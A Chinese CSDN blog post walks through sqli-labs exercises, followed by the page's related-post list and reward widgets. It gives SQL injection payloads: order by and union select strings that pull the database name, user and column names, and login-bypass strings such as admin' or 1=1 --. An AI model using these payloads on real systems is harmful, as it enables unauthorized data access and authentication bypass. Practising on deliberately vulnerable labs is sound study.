SQL注入实操(get、post基于报错的注入,sqlilabs靶场)

最新推荐文章于 2024-05-14 11:02:08 发布
最新推荐文章于 2024-05-14 11:02:08 发布
阅读量784 收藏 10
点赞数 18
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ting_liang/article/details/135711625
版权

一、get基于报错的注入

1、利用order by 判断字段数

正确

?id=1'  报错

?id=1' order by 3 --+  (编号为3正确)------可以看出为3个字段

(编号为4错误)

2、union联合注入?id=0(不存在这样的记录,查不到的意思)(报错)

?id=0' union select 1,2,3 --+    (联合查询前面查3个后面查3个)

?id=0' union select 1,database(),user() --+        报: 数据库名  用户名

?id=0%27 union select 1,group_concat(column_name),3 from information_schema.columns where table_name ='user' --+      报:数据库表名

二、post基于报错的注入

在第一关卡得到用户名和密码。

 输入上面的账号密码登入成功

上面是知道密码账号的,如果我们不知道怎么办了

可以先注入一下试一下注入:账号:Dumb\  密码: 123456

万能密码

admin' or 1=1 -- (注意--后面有一个空格) (11关卡)

admin") or 1=1 -- (注意--后面有一个空格) (12关卡)

1、输入账号:Dumb\   密码:123456(发现‘123456“)以”)结尾)

则万能密码是:admin") or 1=1 -- 

ting~liang
关注
  • 18
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
22-4 SQL注入攻击 - post 基于报错注入
weixin_43263566的博客
01-28 74
我们以 Sqli-Lab Less11 为例说明:http://192.168.0.103/sqlilabs/less-11/ (改成自己靶场所在主机的ip地址,不要用本地回环地址不然抓不到包) 正确账号是:admin/admin。这个关卡其实是可以用sql万能密码进行登录的,之前讲过,这里就不说了,这里就介绍一下在这个登录表单中进行sql注入获取敏感信息。如果还不放心就可以用双引号,因为闭合符是单引号的话,我们用双引号页面就不会报错,这里可以自行选择是否测试。使用bp进行sql注入获取敏感信息。
sql注入之GET/POST注入
qq_38135094的博客
04-02 1万+
针对不同数据库,语句有所不同,但是思路大致相同 第一步判断网站是否存在注入, 如 www.xxx.com/news.php?id=10 这个网址,使用and 1=1,and 1=2 判断是否存在注入 还需要判断数据库,在网址后面加上单引号,看报错情况,如果显示Microsoft JET Database错误,则是Access数据库,如果显示ODBC类,则是MSSQL数据库
DFX 安全测试-- 告诉你什么是XSS、sql注入POST和GET的区别....
a64910807的博客
02-25 942
1、用户权限测试  (1) 用户权限控制   1) 用户权限控制主要是对一些有权限控制的功能进行验证   2) 用户A才能进行的操作,B是否能够进行操作(可通过窜session,将在下面介绍)   3)只能有A条件的用户才能查看的页面,是否B能够查看(可直接敲URL访问)   (2) 页面权限控制   1) 必须有登陆权限的页面,是否能够在不登陆情况下进行访问   2)...
简学-SQL注入(GETPOST
码农米格的博客
02-14 3167
简学SQL注入0x01 SQL注入原理0x01.1 SQL注入发生的原因0x01.2 SQL注入会造成的危害0x02 GET注入漏洞。0x02.1 对网站进行 SQL注入测试时,首先需要我们找到注入点0x02.2 尝试`UNION`注入是否生效。0x02.3 测试字段的数量成功-通过回显结果替换其中的选项-获去数据库的详细信息0x02.4 成功获取数据库表-发现users表-进行users表结构信息获取0x02.5 根据回显结果替换字段,获取字段中的数据三级目录 0x01 SQL注入原理 什么是SQL
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 795
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
sql注入详解
热门推荐
yy
05-05 19万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入sqli-labs靶场前几关讲解
m0_70483044的博客
01-09 1804
sql注入简介SQL注入是一种常见的web安全漏洞。sql注入是通过恶意的sql查询或者添加语句插入到应用的输入参数中,再在后台sql服务器解析执行进行的攻击。sql注入原因在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的"数据"拼接到SQL语句中,被当作是SQL语句的一部分执行,从而导致数据库受损。是目前黑客对数据库进行攻击的最常用手段之一。sql注入攻击对象数据库漏洞原因分析web分别前端和后端,前端负责进行展示后端负责处理来自前端的请求并提供前端展示的资源。
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 5150
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
SQL注入sqli-labs手注+sqlmap
m0_63563528的博客
07-19 1828
第一周:SQL注入学习
mysql注入-sqlilabs靶场注入
10-15
sqlilabs靶场全部关卡的详细解析,pdf文档
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场
sqlilabs,里边赠送包含了,sqlilabs过关手册-注入天书,联系sql注入的绝佳靶场
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php,Tomcat+mysql+java(部分关卡需要) Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
继续SQL
qq_47966193的博客
05-09 544
● 例如:datediff('2021-06-08','2021-06-01')返回7,datediff('2021-06-08 23:59:59','2021-06-01 21:00:00')返回7,datediff('2021-06-01','2021-06-08')返回-7。● 例如:year('2021-08-03')返回2021,month('2021-08-03')返回8,day('2021-08-03')返回3。
pgbackrest 备份工具使用 postgresql
liyayou的博客
05-10 669
我们的备份策略基本是,1天1次完整备份,1个小时1次差异备份。注意:命令中postgres:postgres,是为了授权给postgres用户权限,而且最好是用postgres用户,不然会遇到很多操作报无权限【因为postgresql在安装初始化的时候就自动创建了一个系统用户postgres,默认使用的也是postgres】#加上 --delta ,pgBackRest 自动确定数据库集群目录中的哪些文件可以保留,哪些文件需要从备份中恢复 — 它还会删除备份清单中不存在的文件,以便处理不同的更改。
openGauss学习笔记-279 openGauss性能调优-实际调优案例08-改写SQL消除in-clause
超哥的博客
05-10 72
openGauss学习笔记-279 openGauss性能调优-实际调优案例08-改写SQL消除in-clause279.1 现象描述279.2 优化说明 openGauss学习笔记-279 open
Oracle数据库之PL/SQL基本语法(八)
最新发布
pursue_mony的博客
05-14 109
PL/SQL 是 Oracle 数据库中使用的过程化 SQL 语言扩展,它允许你在 SQL 语句中嵌入控制结构、变量声明、异常处理等。用于在 PL/SQL 块中输出调试信息。为了看到这些信息,你需要在 SQL*Plus 或其他客户端中启用它(例如,使用。PL/SQL 代码通常被组织在块(block)中。一个块包含三个部分:声明部分、执行部分和异常处理部分。包是 PL/SQL 中一种将逻辑、变量、常量、游标、类、子程序、异常等组合在一起的数据库对象。在 PL/SQL 中,你可以在。部分来处理运行时错误。
你还了解哪些 Get 注入攻击方式?
05-24
除了之前提到的常见的 Get 注入攻击方式,还有以下几种: 1. 基于时间的盲注:攻击者通过在 SQL 语句中添加延时函数,判断响应时间的长短来判断 SQL 注入是否成功。 2. 基于错误的盲注:攻击者通过在 SQL 语句中添加报错函数,判断系统是否返回错误信息来判断 SQL 注入是否成功。 3. 基于联合查询的注入:攻击者通过 UNION ALL 语句将恶意语句与正常查询语句结合起来,从而获取数据库中的数据。 4. 基于堆叠查询的注入:攻击者通过在 SQL 语句中添加多个查询语句,从而绕过限制,执行任意 SQL 语句。 5. 基于报表的注入:攻击者通过在报表查询语句中添加 SQL 注入代码,获取数据库中的数据。 以上这些方式都是常见的 Get 注入攻击方式,开发者在开发过程中应该注意防范并采取相应的措施来保护应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ting~liang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值